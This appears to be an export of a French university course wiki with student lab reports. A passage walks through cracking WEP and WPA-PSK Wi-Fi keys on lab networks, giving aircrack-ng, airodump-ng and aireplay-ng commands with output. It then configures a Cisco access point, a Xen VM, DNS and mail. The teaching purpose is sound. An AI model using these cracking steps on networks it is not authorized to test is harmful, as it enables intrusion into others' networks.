&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35659</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35659"/>
				<updated>2016-12-06T11:09:33Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;TABLE BORDER=&amp;quot;1&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;CAPTION&amp;gt; Voici le titre du tableau &amp;lt;/CAPTION&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; N° VLAN &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Prénom &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Réseau local &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Nom VM &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; @IP VM &amp;lt;/TH&amp;gt;&lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN20 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Dimitri &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.20.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Vald &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.182/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN21 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Nabil &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.21.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Pnl &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.177/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN22 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Hugo &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.22.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gradur &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.178/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN23 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Otmane &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.23.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Lartiste &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.179/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Clement &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.24.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gringe &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.180/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN25 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Joan &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.25.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Orelsan &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.181/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
&amp;lt;/TABLE&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour configurer notre Cisco, on utilise &amp;lt;i&amp;gt;minicom -os&amp;lt;/i&amp;gt; et pour cela nous devons être en root&lt;br /&gt;
&lt;br /&gt;
Une fois minicom lancé, on vient changer les paramètre de notre Cisco&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
On se connecte en admin sur le Cisco &lt;br /&gt;
&amp;lt;Pre&amp;gt;enable&lt;br /&gt;
config terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID&lt;br /&gt;
&amp;lt;pre&amp;gt;dot11 ssid MAMENE&lt;br /&gt;
authentication open&lt;br /&gt;
guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuraiton de l'interface Dot11Radio0&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key&lt;br /&gt;
encryption mode wep mandatory&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;access-list 701 permit 5cb9.0180.a039   0000.0000.0000&lt;br /&gt;
access-list 701 permit 3ca8.2a7a.05c5   0000.0000.0000&lt;br /&gt;
access-list 701 permit 7429.aff3.fd91   0000.0000.0000&lt;br /&gt;
access-list 701 permit 5cb9.0180.a139   0000.0000.0000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
